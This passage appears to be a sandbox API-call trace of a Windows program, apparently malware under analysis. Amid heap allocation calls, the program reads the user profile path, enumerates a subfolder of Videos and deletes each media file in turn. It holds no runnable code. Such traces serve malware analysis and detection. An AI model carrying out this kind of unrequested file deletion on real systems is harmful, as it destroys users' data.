returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0258.799] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.799] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0258.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0258.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5a) returned 0x240da88 [0258.801] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/o7xXPd8", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8", lpFilePart=0x8bedfc*="o7xXPd8") returned 0x2c [0258.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240da88 | out: hHeap=0x25c0000) returned 1 [0258.801] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8")) returned 0x10 [0258.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7bad60, ftCreationTime.dwHighDateTime=0x1d4c723, ftLastAccessTime.dwLowDateTime=0x5d997bf0, ftLastAccessTime.dwHighDateTime=0x1d4cd4e, ftLastWriteTime.dwLowDateTime=0x5d997bf0, ftLastWriteTime.dwHighDateTime=0x1d4cd4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1915, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa5760 [0258.801] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a7bad60, ftCreationTime.dwHighDateTime=0x1d4c723, ftLastAccessTime.dwLowDateTime=0x5d997bf0, ftLastAccessTime.dwHighDateTime=0x1d4cd4e, ftLastWriteTime.dwLowDateTime=0x5d997bf0, ftLastWriteTime.dwHighDateTime=0x1d4cd4e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1915, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0258.801] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c27b450, ftCreationTime.dwHighDateTime=0x1d4cd80, ftLastAccessTime.dwLowDateTime=0x1c7fcfc0, ftLastAccessTime.dwHighDateTime=0x1d4ca5b, ftLastWriteTime.dwLowDateTime=0x1c7fcfc0, ftLastWriteTime.dwHighDateTime=0x1d4ca5b, nFileSizeHigh=0x0, nFileSizeLow=0x13c0c, dwReserved0=0x1915, dwReserved1=0x4, cFileName="1R1xRlir Ic2hs.swf", cAlternateFileName="1R1XRL~1.SWF")) returned 1 [0258.801] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\1R1xRlir Ic2hs.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8\\1r1xrlir ic2hs.swf")) returned 1 [0258.802] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e0b50, ftCreationTime.dwHighDateTime=0x1d4d10b, ftLastAccessTime.dwLowDateTime=0xaa30a1a0, ftLastAccessTime.dwHighDateTime=0x1d4c772, ftLastWriteTime.dwLowDateTime=0xaa30a1a0, ftLastWriteTime.dwHighDateTime=0x1d4c772, nFileSizeHigh=0x0, nFileSizeLow=0x1414f, dwReserved0=0x1915, dwReserved1=0x4, cFileName="D104xp.avi", cAlternateFileName="")) returned 1 [0258.802] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\D104xp.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8\\d104xp.avi")) returned 1 [0258.803] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29d8f660, ftCreationTime.dwHighDateTime=0x1d4c948, ftLastAccessTime.dwLowDateTime=0x88125360, ftLastAccessTime.dwHighDateTime=0x1d4c651, ftLastWriteTime.dwLowDateTime=0x88125360, ftLastWriteTime.dwHighDateTime=0x1d4c651, nFileSizeHigh=0x0, nFileSizeLow=0x5ffa, dwReserved0=0x1915, dwReserved1=0x4, cFileName="d8o1n9TC1KVIezYyJ.mkv", cAlternateFileName="D8O1N9~1.MKV")) returned 1 [0258.803] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\d8o1n9TC1KVIezYyJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8\\d8o1n9tc1kviezyyj.mkv")) returned 1 [0258.804] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e3da970, ftCreationTime.dwHighDateTime=0x1d4cd13, ftLastAccessTime.dwLowDateTime=0xf987d9d0, ftLastAccessTime.dwHighDateTime=0x1d4d0cd, ftLastWriteTime.dwLowDateTime=0xf987d9d0, ftLastWriteTime.dwHighDateTime=0x1d4d0cd, nFileSizeHigh=0x0, nFileSizeLow=0x92e5, dwReserved0=0x1915, dwReserved1=0x4, cFileName="F A1Q.swf", cAlternateFileName="FA1Q~1.SWF")) returned 1 [0258.804] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\F A1Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8\\f a1q.swf")) returned 1 [0258.805] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67013660, ftCreationTime.dwHighDateTime=0x1d4d118, ftLastAccessTime.dwLowDateTime=0x335cfc0, ftLastAccessTime.dwHighDateTime=0x1d4cd6b, ftLastWriteTime.dwLowDateTime=0x335cfc0, ftLastWriteTime.dwHighDateTime=0x1d4cd6b, nFileSizeHigh=0x0, nFileSizeLow=0xb643, dwReserved0=0x1915, dwReserved1=0x4, cFileName="GlhF2rLgHBmW_M-5v.mp4", cAlternateFileName="GLHF2R~1.MP4")) returned 1 [0258.805] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\GlhF2rLgHBmW_M-5v.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8\\glhf2rlghbmw_m-5v.mp4")) returned 1 [0258.805] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e9960, ftCreationTime.dwHighDateTime=0x1d4c823, ftLastAccessTime.dwLowDateTime=0x4a7d7ed0, ftLastAccessTime.dwHighDateTime=0x1d4c5e8, ftLastWriteTime.dwLowDateTime=0x4a7d7ed0, ftLastWriteTime.dwHighDateTime=0x1d4c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x145db, dwReserved0=0x1915, dwReserved1=0x4, cFileName="uCBp8g5D7JkZ1cTFQHo.mkv", cAlternateFileName="UCBP8G~1.MKV")) returned 1 [0258.805] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8\\uCBp8g5D7JkZ1cTFQHo.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o7xxpd8\\ucbp8g5d7jkz1ctfqho.mkv")) returned 1 [0258.806] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7e9960, ftCreationTime.dwHighDateTime=0x1d4c823, ftLastAccessTime.dwLowDateTime=0x4a7d7ed0, ftLastAccessTime.dwHighDateTime=0x1d4c5e8, ftLastWriteTime.dwLowDateTime=0x4a7d7ed0, ftLastWriteTime.dwHighDateTime=0x1d4c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x145db, dwReserved0=0x1915, dwReserved1=0x4, cFileName="uCBp8g5D7JkZ1cTFQHo.mkv", cAlternateFileName="UCBP8G~1.MKV")) returned 0 [0258.806] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0258.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.807] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0258.807] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0258.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0258.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.810] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0258.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5a) returned 0x240da88 [0258.813] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/o7xXPd8", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: 